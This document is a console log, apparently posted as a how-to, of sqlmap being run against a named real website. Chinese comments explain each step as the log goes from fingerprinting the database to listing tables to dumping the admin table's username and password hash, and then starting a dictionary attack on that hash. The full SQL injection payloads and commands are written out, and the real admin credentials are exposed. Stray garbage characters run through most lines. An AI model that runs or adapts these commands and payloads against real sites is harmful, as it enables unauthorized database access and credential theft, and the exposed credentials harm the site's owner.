D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 V6 ]3 x, r' n9 Z, T: p# pms "Mysql" --current-user /* 注解:获取当前用户名称5 y& K, h+ v6 H8 v5 \0 n j. x
sqlmap/0.9 - automatic SQL injection and database takeover tool7 Z/ E! F: o( E: t8 Z) ?' F
http://sqlmap.sourceforge.net starting at: 16:53:54, s! _5 o: ?* I& t4 X- ~% D n
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
& O2 U% P& c7 ^- Z1 t( s session file# A0 I# p* y4 {+ C
[16:53:54] [INFO] resuming injection data from session file
$ M W, w% z8 Z1 Q[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 r: k( G- D& s2 \- {9 {[16:53:54] [INFO] testing connection to the target url
& Q% i6 }7 r; J+ V7 C- m. @8 L0 F' Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque% \6 X+ U2 x3 {1 N' q* E5 y
sts:
( {- u, x+ O: H! L- h$ v1 p+ q---; h' t8 ]9 p1 o: A* w2 C& `
Place: GET
& I, \1 V* h- |; dParameter: id
5 z. J' [% E4 x1 S& P: L Type: boolean-based blind
4 `) s1 [, ^! ? Title: AND boolean-based blind - WHERE or HAVING clause
. B2 |) J! D" b) U( U ^ Payload: id=276 AND 799=799; [" E3 P; L. V& h$ H1 M
Type: error-based
- |* V+ a3 n! _8 `4 ? Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# D; m* ]$ Y! f p; Z5 h9 D% q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 }3 ?* U& I& L/ e/ z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 P2 h- Q1 S3 P" z- m: E. ^7 \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 A- W' G# D' G# }6 I V" Y
Type: UNION query- I8 L, {9 |$ B7 n3 F- r
Title: MySQL UNION query (NULL) - 1 to 10 columns7 I* h( X; |$ k( j: i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 y/ P) I- x7 J, d+ K(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& Z" Z% d7 u4 {* m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% u1 f& v _' ^ Type: AND/OR time-based blind. N# w+ t3 v5 t
Title: MySQL > 5.0.11 AND time-based blind
2 O# P- H& Q" U/ e( Y2 x' c Payload: id=276 AND SLEEP(5)& Q: v- y0 k* e" T: F' O
---
0 Q: f4 N1 F9 p/ I' `% ` j[16:53:55] [INFO] the back-end DBMS is MySQL( U4 \, ?4 G+ w0 Z& _
web server operating system: Windows
: O4 S1 `- C0 z+ F2 Iweb application technology: Apache 2.2.11, PHP 5.3.0. t2 M+ y3 e0 u4 x( |# m
back-end DBMS: MySQL 5.0
! k3 G$ E: N& r: W7 I9 D[16:53:55] [INFO] fetching current user: A" j& F& ~+ T2 n
current user: 'root@localhost' + F% g5 r' U" D: F% g
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: f7 f/ S p# L" \9 ctput\www.wepost.com.hk' shutting down at: 16:53:58. H7 c9 C! G9 f/ M
2 X: s9 a* P, L3 x0 W9 p
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' D% P! E/ O1 U- O5 {) p o8 l
ms "Mysql" --current-db /*当前数据库
0 S& J5 v- d$ C; u, u; i7 M- }5 I sqlmap/0.9 - automatic SQL injection and database takeover tool x2 [# u" m" F8 f) |: r" Q% t
http://sqlmap.sourceforge.net starting at: 16:54:16
4 R* g! X r3 I5 L' _[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% C9 Z" L6 J7 x3 _' { session file
- h& Z1 E. Z0 T o" p( R4 M* D[16:54:16] [INFO] resuming injection data from session file
0 }0 u! r" I2 U7 b[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 k4 h V/ O" \1 U8 {4 O2 ?
[16:54:16] [INFO] testing connection to the target url
' A" g# w, \; Usqlmap identified the following injection points with a total of 0 HTTP(s) reque, G7 M& \0 E8 R) n. n) O, r
sts:6 _5 v' N5 L V5 ^/ q& ^, @9 Q5 n
---: @% e: N% m4 j$ \% u# U
Place: GET7 q+ N& y W) Q- p' ]
Parameter: id; t, \# K5 v; r3 L, U6 V4 m
Type: boolean-based blind
. M8 c" Z& f5 ^) _* H5 p7 F# v' U Title: AND boolean-based blind - WHERE or HAVING clause
7 I% f( s' U1 k" ?/ ], x) H Payload: id=276 AND 799=7998 E x/ ^3 V, S+ G2 y& o$ K
Type: error-based
q0 v/ `& N1 F. G" p& ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause0 w t, b$ z h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ G. E+ U5 A( a2 o8 }9 d6 V
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 |8 C$ N" h" q4 a2 G8 h),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): b, k, [5 g* o) |
Type: UNION query( c. Z3 H6 v/ x" U0 @8 ^" G& P3 o
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 l- f$ \1 s. O( Y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 Z+ ~+ T( @, Y- |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, L" b' E2 m. N8 {% u9 F8 M" |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# U: d4 ~. r9 R" n* } Type: AND/OR time-based blind
# F1 f* |( U* \ Q; d Title: MySQL > 5.0.11 AND time-based blind7 d: L0 P, t# K# Y
Payload: id=276 AND SLEEP(5)# d7 o' w# h0 d) _7 w- u, U
---
' [* x; S( n& c6 e- g g[16:54:17] [INFO] the back-end DBMS is MySQL
9 N( j1 g K8 M$ oweb server operating system: Windows
( H% V& {1 d+ Y; H3 _8 C, [web application technology: Apache 2.2.11, PHP 5.3.0# p8 C9 o% |' m7 {* n* s
back-end DBMS: MySQL 5.0
3 `" @! T/ d1 Q! M[16:54:17] [INFO] fetching current database( v$ E5 `3 M& ~; O* V b/ d" o/ X
current database: 'wepost'; M' s# N8 D4 u2 r( m
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 v5 O5 g1 D+ d1 `* [$ E$ Etput\www.wepost.com.hk' shutting down at: 16:54:18
, K5 J; T: u" g5 MD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 h1 _7 D) F; q8 U* i* a8 S9 ems "Mysql" --tables -D "wepost" /*获取当前数据库的表名7 z2 F% Z: o+ {: l0 v. b$ a
sqlmap/0.9 - automatic SQL injection and database takeover tool# X) }5 T( H H [$ y2 g- h3 [! g
http://sqlmap.sourceforge.net starting at: 16:55:25# N( B& z0 a; K
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' U; E/ g0 n* E) O) Q' l
session file) C7 Q0 n" I* e2 Q" V( L8 H1 P, m
[16:55:25] [INFO] resuming injection data from session file; h n/ O. _; |7 L# X. p/ |
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 F, c# |( x% n, K8 j[16:55:25] [INFO] testing connection to the target url
5 N7 q3 s; G, Q) D& a; T1 Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 ?# o8 S( p0 Q0 Y5 z# m9 D- H$ Zsts:! K# z! l! h$ K& T2 t1 ? I0 V
---$ J$ k* J6 G" C5 t" x9 ~ q" F
Place: GET1 i1 A* I: a, u& o. h( p
Parameter: id, W; N, |; j$ ]8 S
Type: boolean-based blind
0 `' |! K Z# D1 S K5 R Title: AND boolean-based blind - WHERE or HAVING clause
6 F3 T8 i( l. C2 m Payload: id=276 AND 799=7994 u! _& o5 v) i* v. T) i5 v) v
Type: error-based
5 N3 `% x9 ~: j+ Y6 L/ ~: ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- M8 }( q; Y' S' b. F4 v* T1 S: B Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 D, u2 n1 W% r6 L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" h0 e6 E( ]- D* u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); k1 ]1 P3 s. ^ s, n
Type: UNION query
. M' y' C; h' Z2 `, _ Title: MySQL UNION query (NULL) - 1 to 10 columns) d U: h e& D0 c0 q% y
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! p# m' y) i' ?5 j( u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 h$ M; _6 |$ a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 ?, V8 r+ G3 ~' I$ n Type: AND/OR time-based blind
# J% o# P! X* J/ g& H" v Title: MySQL > 5.0.11 AND time-based blind/ R/ L, J6 l* K- Y
Payload: id=276 AND SLEEP(5)" n& m v: Z/ X
---
$ k: U: x+ F. v6 u l" f7 V[16:55:26] [INFO] the back-end DBMS is MySQL* }, S. X* T6 |' P1 r3 f
web server operating system: Windows
- R1 e5 a- Z3 J1 f+ L' U) Jweb application technology: Apache 2.2.11, PHP 5.3.0
4 ]/ A8 o. P) d! r [7 @2 C: y( kback-end DBMS: MySQL 5.07 P7 T7 ~1 F2 C/ e. o
[16:55:26] [INFO] fetching tables for database 'wepost'9 g/ s7 y6 K6 i( E
[16:55:27] [INFO] the SQL query used returns 6 entries D* D$ ~5 o4 n
Database: wepost; g4 r( o" K, F7 e" I! x
[6 tables]
# U4 g8 G" Y Y/ n' _" \+-------------+; G" P* Q+ K4 C
| admin |' r* t v, |3 ?& \! D7 R- `" _
| article |
, R$ c9 D2 u: ?- D* V1 e: z* m| contributor |
: B9 q M' s. I( u| idea |
3 J; T y+ i3 \8 e. g; M0 }| image |
: U* N* _* L/ S1 ?| issue |
7 r" r E( z0 U! o A: G+ U+-------------+5 d# W9 t. {' v0 B8 b
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ Y6 K6 P# ]4 Z, n, L8 atput\www.wepost.com.hk' shutting down at: 16:55:33
4 o6 t1 i6 x+ H* l9 W
5 H) L1 p- k* P; AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! E) Z1 `# \+ [, _
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名* ~+ A8 K' B d& x
sqlmap/0.9 - automatic SQL injection and database takeover tool+ P9 h9 d& s+ T
http://sqlmap.sourceforge.net starting at: 16:56:06
. e. m" V3 ]/ B/ `sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% h$ A3 Z( a" I5 @5 Q: `sts:0 U% q2 T2 o8 O" u
---
1 v0 E. v/ w7 G. V: pPlace: GET f* |) B+ k" ^# M
Parameter: id
8 {6 S6 g% M- ]# X4 i7 _ Type: boolean-based blind
9 u/ Y2 O! `% s0 ]7 T+ ] Title: AND boolean-based blind - WHERE or HAVING clause; V& u1 l" K% l9 r8 }" \$ l# j2 f; X
Payload: id=276 AND 799=799
" P. {( D6 @# w8 e6 l2 R Type: error-based
$ V' {. G) ^3 Z* h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ T$ Q( s+ {% S- R2 _: e: O' B8 P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 l3 W. p. j9 j/ r5 J1 I* Q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, m# }- f- L7 _, B% _' i; [+ ^/ D* b),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 x; b3 |2 R! M5 O; i, e0 v+ K Type: UNION query
1 v0 _* e0 p8 r. F: S& ^; z7 C Title: MySQL UNION query (NULL) - 1 to 10 columns
Z2 N9 w% M( }! n! n Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 V- y- d2 `! {) a3 D& Z8 s, u: C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ e9 d1 O+ v! j7 s9 Z& ?, wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 q4 d9 q0 x2 X% E, k
Type: AND/OR time-based blind' h6 ~3 j& n* f' y( R" O( ?
Title: MySQL > 5.0.11 AND time-based blind" {! M9 v$ O9 Q) U( b* Q
Payload: id=276 AND SLEEP(5)
- |% G! L3 C; H% ?3 c% m# f2 r6 @% u---
+ ]3 G# J/ S- e: uweb server operating system: Windows
+ _' k: P- c* p& U5 ^5 V; sweb application technology: Apache 2.2.11, PHP 5.3.0! M: N% J8 o( T1 r" j0 Q
back-end DBMS: MySQL 5.0
6 o- j% R4 u% [4 O" r[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
) O8 A: C2 y6 ~7 r% Assion': wepost, wepost: C+ f# n8 c& m
Database: wepost
! x( m5 |6 U8 X$ m$ C# ETable: admin
$ u, N+ R# b' i( b8 B9 \- u[4 columns]
/ U0 @+ r3 p# L/ ^7 D+----------+-------------+0 B/ b x# h7 y
| Column | Type |
; Y9 w, `' z6 k# ?6 L! m$ e) r+----------+-------------+
9 A' E; u- N. Z8 L, m8 _| id | int(11) |
P2 i, \' w @. d" L/ W5 A| password | varchar(32) |
9 M3 @6 B; s) {| type | varchar(10) |
# B7 `( g9 r9 p| userid | varchar(20) |
% u8 ^& l! g4 I( z1 e+----------+-------------++ J# o6 I! c6 j0 k* g x0 B: \
shutting down at: 16:56:19
- G2 k! w8 v [* E- P
0 V+ l" s- h8 d+ A, BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 Q; {6 I( _ I$ A4 ^, e3 X0 lms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容4 n: k: C, p# Q8 X
sqlmap/0.9 - automatic SQL injection and database takeover tool7 K' V% [3 M# T& R1 h, X- K) l
http://sqlmap.sourceforge.net starting at: 16:57:14
2 s" ^2 E: h2 q5 c8 p4 asqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ {0 l4 S0 Q0 O+ ?" H% X" Fsts:6 d2 W0 P! J; @
---
: w' H0 U/ F1 {- @ y' H9 \Place: GET, V- V; r+ E* u! o9 I
Parameter: id7 c1 f5 c, Z0 m+ e1 l4 z4 l8 v
Type: boolean-based blind
* \0 e' {, j+ o, K Title: AND boolean-based blind - WHERE or HAVING clause
4 c1 b1 _7 X$ u2 x1 O Payload: id=276 AND 799=799* ?: x" {' }2 q
Type: error-based0 l& n D5 \2 z" Q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 W# f: j5 [+ ]$ z5 L% O3 o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' q# o: c p, R3 |8 Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 I8 _9 H: ~1 S8 ~3 x9 C, c' {( B
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( K/ E: M8 b- w Type: UNION query5 Z s" R8 g! D1 A! G
Title: MySQL UNION query (NULL) - 1 to 10 columns
J h3 T) ~. N3 K( ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 X: ^! Y7 n. O1 ?: G R5 a+ F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( W+ j. k, Y" |, O9 ^1 z. y) H4 GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! K( s% `/ l) k, U. m: j+ L Type: AND/OR time-based blind
* ?: L, j* w/ |: ^( B4 C5 M& w# v Title: MySQL > 5.0.11 AND time-based blind
, M$ `0 h4 \( x. k* H8 e( W' m Payload: id=276 AND SLEEP(5)# d/ H+ \* J1 X
---
. U0 v# q& v) X3 _web server operating system: Windows3 s& \* T- p O8 p$ T, X# t
web application technology: Apache 2.2.11, PHP 5.3.0
0 P; m# b: ?& i/ W0 j Sback-end DBMS: MySQL 5.0' x+ B( V: p. i9 A8 L
recognized possible password hash values. do you want to use dictionary attack o# }6 B5 W! L/ j( _
n retrieved table items? [Y/n/q] y, q% g* ^) |8 P$ s& E8 T) c
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]& d" a: k6 s$ Y! D/ s- j. c0 M8 C
do you want to use common password suffixes? (slow!) [y/N] y
2 O4 P; I |" }$ X3 h$ Q% rDatabase: wepost. p, P) W% N$ h1 `
Table: admin
( o: D. q9 H/ x[1 entry]5 D* V2 {; _6 O. s. A& R
+----------------------------------+------------+6 @ X% N6 h. z4 ^0 J
| password | userid |! x" u) B- f3 j* }7 S/ W" R
+----------------------------------+------------+) F" v9 _. C$ D" q9 W
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+ G, N c' ^4 q$ `# t% K5 k3 S) D+----------------------------------+------------+
, }6 M$ t W- t shutting down at: 16:58:14: i! t2 _# E3 O9 D2 X# M* ?
9 g& l7 S. l8 k! mD:\Python27\sqlmap> |